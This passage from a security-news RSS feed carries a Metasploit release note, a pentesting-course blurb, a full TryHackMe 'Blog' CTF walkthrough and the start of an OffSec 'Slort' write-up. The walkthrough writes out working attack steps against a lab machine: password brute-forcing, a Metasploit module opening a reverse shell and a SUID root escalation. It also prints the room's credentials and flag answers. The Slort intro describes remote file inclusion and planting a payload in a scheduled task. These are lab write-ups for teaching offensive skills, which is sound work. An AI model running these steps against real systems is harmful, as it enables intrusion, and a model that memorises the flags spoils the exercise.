6.4.140...6.4.141</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.140...6.4.141">Full diff 6.4.140...6.4.141</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kage – Graphical User Interface For Metasploit Meterpreter And Session Handler]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3621782/it-security-nachrichten/kage-graphical-user-interface-for-metasploit-meterpreter-and-session-handler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621782/it-security-nachrichten/kage-graphical-user-interface-for-metasploit-meterpreter-and-session-handler/</guid>
<pubDate>Wed, 24 Jun 2026 16:54:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://api.follow.it/track-rss-story-loaded/v1/SUcARaChKZi1W-po-ZI-lXn9ye8UNv30" border="0" width="1" height="1" alt="Kage – Graphical User Interface For Metasploit Meterpreter And Session Handler" title="Kage – Graphical User Interface For Metasploit Meterpreter And Session Handler">]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Metasploit Update: NTLM Relay Priv Esc, MCP Server Integration, Paperclip AI RCE Chain, and more]]></title>
<description><![CDATA[This week's release includes five new modules, including a full unauthenticated RCE chain for Paperclip AI and a VS Code extension persistence technique. On the post-exploitation side, the new windows/local/ntlm_relay_2_self module coerces the local machine account to authenticate via OpenEncrypt...]]></description>
<link>https://tsecurity.de/de/3611053/it-security-nachrichten/weekly-metasploit-update-ntlm-relay-priv-esc-mcp-server-integration-paperclip-ai-rce-chain-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611053/it-security-nachrichten/weekly-metasploit-update-ntlm-relay-priv-esc-mcp-server-integration-paperclip-ai-rce-chain-and-more/</guid>
<pubDate>Fri, 19 Jun 2026 19:38:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This week's release includes five new modules, including a full unauthenticated RCE chain for Paperclip AI and a VS Code extension persistence technique. On the post-exploitation side, the new <span data-type="inlineCode">windows/local/ntlm_relay_2_self</span> module coerces the local machine account to authenticate via OpenEncryptedFileRaw (WebDAV), relays that NTLM authentication to a Domain Controller's LDAP service, then uses the resulting LDAP session to write Shadow Credentials and obtain a Kerberos service ticket as Administrator via S4U2Proxy, enabling PsExec back to itself for SYSTEM access.</p><p>On the enhancement side, the new MCP server plugin lets AI tools assist operators directly within a running msfconsole instance, and module check codes now return richer detail for users.</p><h2>New module content (5)</h2><h3>Paperclip AI RCE using a chain of six API calls (CVE-2026-41679)</h3><p>Authors: Sagilayani <a href="https://github.com/sagilayani">https://github.com/sagilayani</a> and h00die-gr3y <a href="mailto:h00die.gr3y@gmail.com">h00die.gr3y@gmail.com</a></p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21547">#21547</a> contributed by <a href="https://github.com/h00die-gr3y">h00die-gr3y</a></p><p>Path: <span data-type="inlineCode">linux/http/paperclipai_unauth_rce_cve_2026_41679</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-41679&amp;referrer=blog">CVE-2026-41679</a></p><p>Description: Adds an exploit module for CVE-2026-41679 which exploits Paperclip. An unauthenticated attacker can achieve full remote code execution on any network-accessible Paperclip instance running in authenticated mode with default configuration. The entire chain is six API calls.</p><h3>Xerte Online Toolkits Arbitrary File Upload - Unauthenticated Media Upload</h3><p>Author: bootstrapbool <a href="mailto:bootstrapbool@gmail.com">bootstrapbool@gmail.com</a></p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21371">#21371</a> contributed by <a href="https://github.com/bootstrapbool">bootstrapbool</a></p><p>Path: <span data-type="inlineCode">multi/http/xerte_unauthenticated_mediaupload</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-41459&amp;referrer=blog">CVE-2026-41459</a></p><p>Description: Exploits authentication failure (<span data-type="inlineCode">CVE-2026-34413</span>), extension blacklist (<span data-type="inlineCode">CVE-2026-34415</span>), and path traversal (<span data-type="inlineCode">CVE-2026-34414</span>) vulnerabilities in Xerte Online Toolkits versions 3.15 and earlier.</p><h3>VS Code Extension Persistence</h3><p>Author: h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21465">#21465</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: <span data-type="inlineCode">multi/persistence/vscode_extension</span></p><p>Description: Adds a new persistence module that achieves persistence by installing a malicious extension into a user's VS Code extensions directory. The next time the target opens VS Code, the extension executes and delivers a shell back to the attacker.</p><h3>NTLM Relay to Self (HTTP to LDAP) - Post Exploitation</h3><p>Author: jheysel-r7</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21430">#21430</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a></p><p>Path: windows/local/ntlm_relay_2_self</p><p>Description: Adds a module that exploits the NTLMRelay2Self attack. It requires a low-privilege user session on a Windows host.</p><h3>Linux Kernel __ptrace_may_access() Exit Race Change File Disclosure</h3><p>Authors: 0xdeadbeefnetwork and bhaskarbhar</p><p>Type: Post</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21472">#21472</a> contributed by <a href="https://github.com/bhaskarbhar">bhaskarbhar</a></p><p>Path: <span data-type="inlineCode">linux/gather/cve_2026_46333_chage</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-46333&amp;referrer=blog">CVE-2026-46333</a></p><p>Description: Adds a post module that leverages CVE-2026-46333, a vulnerability in the Linux kernel whereby a race condition exists when tearing down a process. A local attacker can exploit this to obtain file handles they would not otherwise have access to. In the exploit, this is leveraged to leak the contents of the /etc/shadow file.</p><h2>Enhancements and features (7)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21254">#21254</a> from <a href="https://github.com/golem445">golem445</a> - Nmap imports will include domain name if supplied by the user for the scan.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21259">#21259</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Adds a number of enhancements to msfconsole's search functionality by cleaning up some inconsistencies and giving users the option to hide the child elements of search results with the <span data-type="inlineCode">-c</span> flag. Also introduces two global options, <span data-type="inlineCode">SearchSort</span> and <span data-type="inlineCode">SearchChildMode</span>, that users can set and forget in order to control ascending/descending search results and whether or not child items appear under search results respectively.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21367">#21367</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Adds a number of enhancements to the <span data-type="inlineCode">rexec_login</span> module including more detailed output, a check for an rDNS failure, an update to the module description, and removal of duplicate IP:PORT printing.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21454">#21454</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Updates many modules by adding additional details to the check codes that are returned by the #check method, which provides additional information for the user. Also updates the requirements of new modules to contain this extra information moving forward.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21512">#21512</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Updates the Metasploit MCP tool to expose note information on Metasploit modules, as well as host comments.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21537">#21537</a> from <a href="https://github.com/dwelch-r7">dwelch-r7</a> - Adds a plugin to start and stop a Model Context Protocol (<span data-type="inlineCode">MCP</span>) server within msfconsole. When compared to the standalone <span data-type="inlineCode">msfmcpd</span> tool, this has the significant advantage of automatically loading the RPC server within the context of a running framework instance which enables AI tools to assist the operator without needing to restart Metasploit.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21542">#21542</a> from <a href="https://github.com/h00die">h00die</a> - Updates the <span data-type="inlineCode">scanner/redis/redis_server</span> module to output server INFO details as a readable table.</li></ul><h2>Bugs fixed (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21441">#21441</a> from <a href="https://github.com/dwelch-r7">dwelch-r7</a> - Improves the <span data-type="inlineCode">MCP</span> server lifecycle control and enables graceful shutdowns by transitioning from Rack's handler to direct Puma server API management.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21564">#21564</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a crash in the <span data-type="inlineCode">smb_version</span> module when run against SMBv1 targets.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21570">#21570</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Fixes an issue where it was not possible to generate ARM Big Endian payloads.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21571">#21571</a> from <a href="https://github.com/dwelch-r7">dwelch-r7</a> - Deleted files are now excluded when running <span data-type="inlineCode">msfconsole</span> <span data-type="inlineCode">reload</span> commands.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-06-11T10%3A00%3A50Z..2026-06-18T10%3A42%3A18%2B01%3A00%22">Pull Requests 6.4.137...6.4.139</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.137...6.4.139">Full diff 6.4.137...6.4.139</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Proaktive IT-Security mit Pentesting – Ethical Hacking für Admins | heise online]]></title>
<description><![CDATA[Ein besonderer Fokus liegt auf dem Exploit-Framework Metasploit, mit dem Hacker identifizierte Schwachstellen gezielt ausnutzen. Härtung interner und ...]]></description>
<link>https://tsecurity.de/de/3608780/hacking/proaktive-it-security-mit-pentesting-ethical-hacking-fuer-admins-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608780/hacking/proaktive-it-security-mit-pentesting-ethical-hacking-fuer-admins-heise-online/</guid>
<pubDate>Thu, 18 Jun 2026 21:23:27 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein besonderer Fokus liegt auf dem Exploit-Framework Metasploit, mit dem <b>Hacker</b> identifizierte Schwachstellen gezielt ausnutzen. Härtung interner und ...]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe — Blog CTF | Full Write-Up]]></title>
<description><![CDATA[Platform: TryHackMeRoom: BlogDifficulty: MediumAuthor: Shikhali Jamalzade“Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome!”IntroductionThe Blog room on TryHackMe is a medium-difficulty machine themed around a WordPress blog run by “Billy Joel...]]></description>
<link>https://tsecurity.de/de/3606856/hacking/tryhackme-blog-ctf-full-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606856/hacking/tryhackme-blog-ctf-full-write-up/</guid>
<pubDate>Thu, 18 Jun 2026 08:51:19 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uiddSAKswc3c72q8QRJ2Wg.png"></figure><h4><strong>Platform:</strong> <a href="https://tryhackme.com/p/alisalive.exe">TryHackMe</a><br><strong>Room:</strong> <a href="https://tryhackme.com/room/blog">Blog</a><br><strong>Difficulty:</strong> Medium<br><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a></h4><blockquote>“Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome!”</blockquote><h3>Introduction</h3><p>The <strong>Blog</strong> room on TryHackMe is a medium-difficulty machine themed around a WordPress blog run by “Billy Joel.” Beneath the casual surface, the machine hides a real CVE — <strong>CVE-2019–8942</strong>, a WordPress image crop Remote Code Execution vulnerability — paired with an unconventional custom binary for privilege escalation that’ll make you think twice before assuming an exploit needs complex reverse engineering.</p><p>Your goals:</p><ul><li>Find user.txt (not where you expect it)</li><li>Find root.txt</li><li>Answer three bonus questions about the machine</li></ul><p>There’s also a deliberate <strong>rabbit hole</strong> built into this room — a clue about a company called “Rubber Ducky Inc.” that hints at where the real user.txt is hiding. More on that later.</p><h3>Setup — /etc/hosts</h3><p>Before anything else, the room requires you to add an entry to your hosts file. Without this, the WordPress site won’t load correctly due to how it handles virtual hosting on AWS.</p><p>bash</p><pre>echo "&lt;TARGET_IP&gt; blog.thm" | sudo tee -a /etc/hosts</pre><p>Verify it works:</p><p>bash</p><pre>curl -s http://blog.thm | head -20</pre><h3>Phase 1 — Reconnaissance</h3><h3>Nmap Scan</h3><p>bash</p><pre>nmap -sC -sV -T4 -oN nmap_scan.txt &lt;TARGET_IP&gt;</pre><p><strong>Results:</strong></p><pre>PORT    STATE SERVICE     VERSION<br>22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu<br>80/tcp  open  http        Apache httpd 2.4.29<br>139/tcp open  netbios-ssn Samba smbd 3.X - 4.X<br>445/tcp open  microsoft-ds Samba smbd 4.7.6-Ubuntu</pre><p>Four open ports: SSH (22), HTTP (80), and two SMB ports (139, 445). The SMB shares are interesting — let’s note them for later. The web server on port 80 is our primary entry point.</p><p>The nmap script output also reveals something valuable right away:</p><pre>| http-generator: WordPress 5.0</pre><p>WordPress 5.0. That version number will be very significant shortly.</p><h3>Phase 2 — SMB Enumeration (The Rabbit Hole)</h3><p>With SMB open, let’s enumerate it. This is where the room tries to send you down a rabbit hole — and it’s worth walking through so you understand <em>why</em> it’s a dead end.</p><p>bash</p><pre>smbclient -L //&lt;TARGET_IP&gt;/ -N</pre><p>There’s a share called BillySMB. Connect to it:</p><p>bash</p><pre>smbclient //&lt;TARGET_IP&gt;/BillySMB -N<br>smb: \&gt; ls<br>smb: \&gt; get Alice-White-Rabbit.jpg<br>smb: \&gt; get tswift.jpg<br>smb: \&gt; get check-this.png</pre><p>Checking these files for hidden data (steganography):</p><p>bash</p><pre>steghide extract -sf Alice-White-Rabbit.jpg<br>strings check-this.png<br>exiftool tswift.jpg</pre><p>You’ll find a .txt file embedded in the Alice image, but it contains nothing useful for exploitation. The "Rubber Ducky Inc." reference in the room description is actually a hint pointing at /media/usb — but that's for after we get root.</p><p><strong>Verdict: SMB is a rabbit hole. Move on.</strong></p><h3>Phase 3 — WordPress Enumeration</h3><p>Visit http://blog.thm in your browser. It's a simple WordPress blog — a few posts, a comment section, nothing remarkable on the surface.</p><h3>WPScan — Full Enumeration</h3><p>bash</p><pre>wpscan --url http://blog.thm --enumerate ap,at,u --detection-mode aggressive</pre><p><strong>Flag breakdown:</strong></p><ul><li>--enumerate ap — All Plugins</li><li>--enumerate at — All Themes</li><li>--enumerate u — Users</li><li>--detection-mode aggressive — More thorough (generates noise, but we're in a lab)</li></ul><p><strong>Key findings:</strong></p><pre>[+] WordPress version: 5.0 (Insecure, released on 2018-12-06)<br>[+] XML-RPC seems to be enabled: http://blog.thm/xmlrpc.php</pre><pre>[i] User(s) Identified:<br>    [+] kwheel<br>    [+] bjoel<br>    [+] Karen Wheeler<br>    [+] Billy Joel</pre><p>Two important takeaways:</p><ol><li>WordPress 5.0 is running — this is vulnerable to CVE-2019–8942</li><li>We have usernames: kwheel and bjoel</li></ol><p>You can also enumerate users via the WordPress REST API without WPScan:</p><pre>http://blog.thm/wp-json/wp/v2/users</pre><p>This returns a JSON response listing all registered users — another common WordPress misconfiguration.</p><h3>Phase 4 — Credential Brute-Force</h3><p>We have usernames but no passwords. WPScan can brute-force via the XML-RPC interface, which is faster than attacking the login form directly.</p><p>bash</p><pre>wpscan --url http://blog.thm \<br>  -U kwheel,bjoel \<br>  -P /usr/share/wordlists/rockyou.txt \<br>  -t 50</pre><ul><li>-U — Username list</li><li>-P — Password wordlist</li><li>-t 50 — 50 threads for speed</li></ul><p><strong>Result:</strong></p><pre>[SUCCESS] - kwheel / cutiepie1</pre><blockquote><strong><em>Credentials found:</em></strong><em> </em><em>kwheel:cutiepie1</em></blockquote><p>Note that bjoel (Billy Joel himself) doesn't have a crackable password in rockyou — the machine intentionally made kwheel (Karen Wheeler) the weak link.</p><h3>Phase 5 — Exploitation: CVE-2019–8942 (WordPress Crop-Image RCE)</h3><h3>Understanding the Vulnerability</h3><p><strong>CVE-2019–8942</strong> affects WordPress 5.0.0 and earlier. Here’s how it works conceptually:</p><p>When WordPress manages uploaded images, it stores file references in the database as “Post Meta” entries. When cropping an image, WordPress constructs a path from this meta entry — but it doesn’t sanitize the value properly. An attacker with author-level (or higher) access can manipulate this path to point to a PHP file they control, effectively uploading a webshell.</p><p>The vulnerability was discovered by RIPSTECH and patched in WordPress 5.0.1. Our target is running 5.0.0 — right in the vulnerable range.</p><p><strong>References:</strong></p><ul><li><a href="https://www.exploit-db.com/exploits/46662">ExploitDB #46662</a> — Metasploit module</li><li><a href="https://www.exploit-db.com/exploits/49512">ExploitDB #49512</a> — Python manual exploit</li></ul><h3>Exploitation with Metasploit</h3><p>bash</p><pre>msfconsole</pre><pre>msf6 &gt; use exploit/multi/http/wp_crop_rce<br>msf6 exploit(wp_crop_rce) &gt; show options</pre><p>Set the required options:</p><p>bash</p><pre>set RHOSTS &lt;TARGET_IP&gt;<br>set LHOST &lt;YOUR_VPN_IP&gt;     # Your tun0 IP, NOT wlan0<br>set LPORT 4444<br>set USERNAME kwheel<br>set PASSWORD cutiepie1<br>set TARGETURI /<br>run</pre><blockquote><strong><em>Important:</em></strong><em> LHOST must be your TryHackMe VPN IP (</em><em>tun0), not your local network IP. Run </em><em>ip a show tun0 to confirm.</em></blockquote><p>After a moment:</p><pre>[*] Started reverse TCP handler on &lt;YOUR_IP&gt;:4444<br>[*] Authenticating with WordPress using kwheel:cutiepie1...<br>[+] Authenticated with WordPress<br>[*] Preparing payload...<br>[*] Uploading payload<br>[*] Executing the payload<br>[+] Deleted malicious post<br>[+] Deleted malicious attachment<br>[*] Sending stage (39282 bytes) to &lt;TARGET_IP&gt;<br>[+] Meterpreter session 1 opened</pre><p>We have a Meterpreter session as www-data.</p><h3>Upgrading to a Full Shell</h3><p>From Meterpreter, drop into a system shell and stabilize it:</p><p>bash</p><pre>meterpreter &gt; shell<br>python -c 'import pty; pty.spawn("/bin/bash")'<br>export TERM=xterm<br># Press Ctrl+Z, then: stty raw -echo; fg</pre><p>bash</p><pre>id<br># uid=33(www-data) gid=33(www-data) groups=33(www-data)</pre><h3>Phase 6 — Post-Exploitation &amp; Flag Hunting</h3><h3>The Rabbit Hole — /home/bjoel</h3><p>bash</p><pre>cd /home<br>ls<br># bjoel</pre><pre>cd bjoel<br>ls -la<br># -rw-r--r-- 1 bjoel bjoel   57  ... user.txt<br># -rw-r--r-- 1 bjoel bjoel  ... Billy_Joel_Termination_May20-2020.pdf</pre><p>Read user.txt:</p><pre>cat user.txt<br># You won't find what you're looking for here.<br># TRY HARDER</pre><p>Classic CTF misdirection. The user.txt here is intentionally fake. The PDF is also a lore piece: Billy Joel was "terminated" by <strong>Rubber Ducky Inc.</strong> — remember that company name. It's a hint.</p><p>The real user.txt is mounted somewhere else. We'll find it after getting root.</p><h3>wp-config.php — Database Credentials</h3><p>While exploring, check the WordPress config:</p><p>bash</p><pre>cat /var/www/wordpress/wp-config.php | grep -E "DB_NAME|DB_USER|DB_PASSWORD"</pre><p>This reveals database credentials. You can log into MySQL and inspect the wp_users table:</p><p>bash</p><pre>mysql -u wordpress -p wordpress<br>SELECT user_login, user_pass FROM wp_users;</pre><p>You’ll find two password hashes. These are bcrypt-hashed and won’t crack easily — they’re another dead end.</p><h3>Phase 7 — Privilege Escalation: The checker Binary</h3><h3>Finding SUID Files</h3><p>bash</p><pre>find / -perm -u=s -type f 2&gt;/dev/null</pre><p>Among the standard SUID binaries, one stands out:</p><pre>/usr/sbin/checker</pre><p>This is not a standard Linux binary — it’s custom-built for this machine. Owned by root, SUID set. Let’s investigate.</p><h3>Running the Binary</h3><p>bash</p><pre>/usr/sbin/checker<br># Not an Admin</pre><p>It outputs “Not an Admin” and exits. But <em>how</em> does it decide we’re not an admin?</p><h3>Analyzing with ltrace</h3><p>ltrace intercepts and displays library calls made by a program as it runs — perfect for understanding what a binary is checking without needing to decompile it.</p><p>bash</p><pre>ltrace /usr/sbin/checker</pre><p><strong>Output:</strong></p><pre>getenv("admin")                      = nil<br>puts("Not an Admin")                 = 13<br>+++ exited (status 0) +++</pre><p>That’s all we needed to know. The binary calls getenv("admin") — it checks for an environment variable named admin. If it's nil (not set), it prints "Not an Admin" and exits. The check is purely existence-based; <strong>the value doesn't matter</strong>.</p><h3>Deeper Understanding — Ghidra (Optional)</h3><p>For the curious, the binary’s decompiled C logic in Ghidra looks approximately like this:</p><p>c</p><pre>int main() {<br>    char *admin = getenv("admin");<br>    if (admin == NULL) {<br>        puts("Not an Admin");<br>        exit(0);<br>    }<br>    setuid(0);       // Set UID to root<br>    system("/bin/bash");  // Drop into bash as root<br>}</pre><p>Because the binary has the SUID bit set and is owned by root, when setuid(0) is called, it escalates our process to run as root. All we need to do is make sure the admin environment variable exists.</p><h3>Exploiting the Binary</h3><p>bash</p><pre>export admin=1<br>/usr/sbin/checker</pre><p><strong>Result:</strong></p><pre>root@blog:/home/bjoel# id<br>uid=0(root) gid=33(www-data) groups=33(www-data)</pre><p>We are root.</p><h3>Capturing root.txt</h3><p>bash</p><pre>cat /root/root.txt</pre><blockquote><em>🚩 </em><strong><em>root.txt:</em></strong><em> </em><em>9a0b2b618bef9bfa7ac28c1353d9f318</em></blockquote><h3>Phase 8 — Finding the Real user.txt</h3><p>Remember “Rubber Ducky Inc.”? The USB reference in Billy’s termination letter was pointing us here:</p><p>bash</p><pre>find / -name "user.txt" 2&gt;/dev/null</pre><p><strong>Output:</strong></p><pre>/home/bjoel/user.txt       ← the fake one<br>/media/usb/user.txt        ← the real one</pre><p>bash</p><pre>cat /media/usb/user.txt</pre><blockquote><em>🚩 </em><strong><em>user.txt:</em></strong><em> </em><em>c8421899aae571f7af486492b71a8ab7</em></blockquote><p>The USB mount at /media/usb was inaccessible to www-data, which is why we couldn't read it before gaining root. The "Rubber Ducky" and "Termination" story in the PDF was the in-lore hint that a USB drive was involved.</p><h3>Room Questions — Answered</h3><p>QuestionAnswerWhat CMS was Billy using?WordPressWhat version of the above CMS was being used?5.0Where was user.txt found?/media/usb</p><h3>Attack Chain Summary</h3><pre>Nmap → 4 ports: SSH, HTTP (WordPress 5.0), SMB<br>           ↓<br>SMB enumeration → BillySMB share → rabbit hole (steganography, no useful data)<br>           ↓<br>WPScan enumeration → users: kwheel, bjoel<br>           ↓<br>WPScan brute-force via XML-RPC → kwheel:cutiepie1<br>           ↓<br>CVE-2019-8942 (wp_crop_rce) → Meterpreter shell as www-data<br>           ↓<br>/home/bjoel/user.txt → fake flag ("TRY HARDER")<br>PDF hint → "Rubber Ducky Inc." → points to /media/usb<br>           ↓<br>SUID enumeration → /usr/sbin/checker<br>ltrace → getenv("admin") == nil check<br>export admin=1 &amp;&amp; /usr/sbin/checker → root shell<br>           ↓<br>root.txt captured from /root/<br>user.txt captured from /media/usb/</pre><h3>Lessons Learned</h3><p><strong>1. Read the lore.</strong> The PDF found in Billy’s home directory wasn’t just flavor text — “Rubber Ducky Inc.” was the hint pointing at the USB mount. CTF designers embed clues everywhere.</p><p><strong>2. Don’t trust the obvious user.txt.</strong> This room deliberately placed a fake flag to frustrate anyone who found it and thought they were done. Always verify your flags match the expected format.</p><p><strong>3. ltrace is underrated.</strong> You don’t always need Ghidra or a full decompilation to understand a binary. ltrace showed us the exact library call being made in one line. Use it before reaching for heavier tools.</p><p><strong>4. XML-RPC is a wide-open door.</strong> WordPress’s XML-RPC interface (/xmlrpc.php) allows unlimited login attempts by default — no lockout, no CAPTCHA. This makes it a far more efficient brute-force target than the login form itself.</p><p><strong>5. Environment variables as authentication is broken.</strong> The checker binary's logic is fundamentally flawed: checking for the <em>existence</em> of an environment variable (with no signature, no value check, no privilege validation) is not security — it's theater. Any code running in that shell could set the variable.</p><p><strong>6. WordPress 5.0.0 is ancient — patch your CMS.</strong> CVE-2019–8942 was disclosed in February 2019 and patched immediately in 5.0.1. Running unpatched CMS versions is one of the most common real-world attack vectors.</p><h3>Tools Used</h3><p>ToolPurposenmapPort scanning &amp; service fingerprintingsmbclientSMB share enumerationWPScanWordPress enumeration &amp; credential brute-forceMetasploit (wp_crop_rce)CVE-2019-8942 exploitationltraceDynamic binary analysisGhidraStatic binary reverse engineering (optional)findSUID file discovery &amp; flag hunting</p><h3>Flags</h3><p>FlagValueuser.txtc8421899aae571f7af486492b71a8ab7root.txt9a0b2b618bef9bfa7ac28c1353d9f318</p><p><em>Thanks for reading. If you have questions or want to discuss the manual exploitation path for CVE-2019–8942 (without Metasploit), drop a comment below.</em></p><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=5220fa169761" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/tryhackme-blog-ctf-full-write-up-5220fa169761">TryHackMe — Blog CTF | Full Write-Up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Slort — RFI via PHP allow_url_include + Writable Scheduled Task Binary to Administrator | OffSec PG…]]></title>
<description><![CDATA[Slort — RFI via PHP allow_url_include + Writable Scheduled Task Binary to Administrator | OffSec PG PlaySlort is a Windows machine that chains a PHP remote file inclusion vulnerability with a world-writable scheduled task binary to deliver a full Administrator session. The web server on port 8080...]]></description>
<link>https://tsecurity.de/de/3606849/hacking/slort-rfi-via-php-allowurlinclude-writable-scheduled-task-binary-to-administrator-offsec-pg/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606849/hacking/slort-rfi-via-php-allowurlinclude-writable-scheduled-task-binary-to-administrator-offsec-pg/</guid>
<pubDate>Thu, 18 Jun 2026 08:51:11 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Slort — RFI via PHP allow_url_include + Writable Scheduled Task Binary to Administrator | OffSec PG Play</h3><p>Slort is a Windows machine that chains a PHP remote file inclusion vulnerability with a world-writable scheduled task binary to deliver a full Administrator session. The web server on port 8080 runs an XAMPP stack hosting a custom PHP application that passes the ?page= GET parameter directly into include() it with no sanitisation. With allow_url_include enabled — a dangerous PHP setting common in old XAMPP installations — pointing the parameter at an attacker-controlled URL causes the server to fetch and execute arbitrary PHP. That gets a Meterpreter shell as rupert. From there, standard automated enumeration turns up nothing. Manual filesystem exploration finds the answer: C:\Backup\info.txt documents a scheduled task invoked TFTP.EXE on a five-minute interval as Administrator. icacls confirms every authenticated user has full control over the binary. Replace it with a Meterpreter payload and wait for the scheduler to complete the chain.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*cFOBI7_c-J62tSPE1njH_g.png"></figure><p><strong>Attack Path:</strong> ffuf → /site/index.php?page= (RFI via allow_url_include) → Meterpreter as rupert → C:\Backup\TFTP.EXE (world-writable, scheduled as Administrator) → Meterpreter as SLORT\Administrator</p><p><strong>Platform:</strong> OffSec Proving Grounds Play<br> <strong>Machine:</strong> Slort<br> <strong>Difficulty:</strong> Intermediate<br> <strong>OS:</strong> Windows<br> <strong>Date:</strong> 20XX-XX-XX</p><h3>Table of Contents</h3><pre>1. Reconnaissance<br>   1.1  Nmap Port Scan — Fast Pass<br>   1.2  Nmap Port Scan — Full Range<br>   1.3  Dead-End Service Checks (FTP, SMB, MariaDB)<br>2. Web Enumeration<br>   2.1  Directory Busting — Port 8080<br>   2.2  Enumerating /site/<br>   2.3  Identifying the File Inclusion Parameter<br>3. Initial Access — RFI via PHP allow_url_include<br>   3.1  Confirming LFI via Path Traversal<br>   3.2  Confirming RFI and Deploying a PHP Webshell<br>   3.3  Upgrading to an Interactive Meterpreter Session<br>4. Post-Exploitation Enumeration<br>   4.1  Token Privileges<br>   4.2  Group Membership<br>   4.3  Auto-Starting Services<br>   4.4  Scheduled Tasks<br>   4.5  Registry Run Keys<br>   4.6  Manual Filesystem Exploration — C:\Backup<br>5. Privilege Escalation — Writable Scheduled Task Binary<br>   5.1  Confirming Write Access with icacls<br>   5.2  Generating the Replacement Payload<br>   5.3  Overwriting TFTP.EXE<br>   5.4  Catching the Administrator Session<br>6. Proof of Compromise<br>7. Vulnerability Summary<br>8. Defense &amp; Mitigation<br>   8.1  Remote File Inclusion — PHP allow_url_include Enabled<br>   8.2  User Input Passed to include() Without Sanitisation<br>   8.3  World-Writable Scheduled Task Binary</pre><h3>1. Reconnaissance</h3><h3>1.1 Nmap Port Scan — Fast Pass</h3><pre>nmap -Pn -sC -sV -F &lt;TARGET_IP&gt;</pre><p><strong>Results:</strong></p><pre>Port      State  Service   